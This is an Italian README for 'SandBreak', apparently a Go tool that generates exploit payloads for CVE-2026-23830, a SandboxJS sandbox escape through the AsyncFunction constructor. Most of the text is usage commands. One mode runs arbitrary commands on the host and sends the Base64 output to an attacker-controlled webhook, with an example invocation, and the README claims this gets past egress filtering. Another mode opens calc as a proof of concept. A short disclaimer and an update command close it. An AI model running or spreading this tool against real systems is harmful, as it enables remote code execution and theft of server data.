
Genera e fornisce payload di exploit per CVE-2026-23830, una sandbox escape di SandboxJS, con modalità per l'esfiltrazione OOB cieca e il PoC locale di calc. Supporta listener HTTP/HTTPS e produce payload JavaScript minificati.
SandBreak è un robusto generatore di exploit basato su Go, progettato per sfruttare la vulnerabilità di Escape di SandboxJS (CVE-2026-23830).
Questo strumento sfrutta il costruttore AsyncFunction non protetto nelle versioni precedenti di sandboxjs, consentendo agli attaccanti di evadere dall'ambiente sandbox V8 ed eseguire codice arbitrario sul sistema host. Supporta molteplici modalità di payload, tra cui Exfiltrazione OOB Cieca, Defacement e RCE Basata su Errori.
oob: Exfiltrazione di Dati Out-of-Band (HTTP/HTTPS) per scenari ciechi.calc: Apre calc.exe (PoC Classico).Clona il repository ed esegui:
git clone https://github.com/Galaxy-sc/CVE-2026-23830-SandBreak.git
cd CVE-2026-23830-SandBreak
go run CVE-2026-23830.go
go run CVE-2026-23830.go -mode [MODE] -cmd [COMMAND] [OPTIONS]
Usala quando non hai feedback di output. Esegue il comando e invia il risultato codificato in Base64 al tuo listener (es. webhook.site).
go run CVE-2026-23830.go -mode oob -cmd "whoami" -url "https://webhook.site/YOUR-UUID"
Bypassa con successo i crash di base del filtraggio egress gestendo gli errori di rete.
Apre una calcolatrice sul server Windows.
go run CVE-2026-23830.go -mode calc
L'attaccante riceve i dati utente del server tramite Webhook nonostante nessun output visivo sul sito.
Questo strumento è creato esclusivamente per Scopi Educativi e Test di Penetrazione Autorizzati.
Aggiorna sandboxjs all'ultima versione in cui il costruttore AsyncFunction è correttamente isolato nella sandbox.
npm update sandboxjs
Autore: Meysam Bal-afkan
Licenza: MIT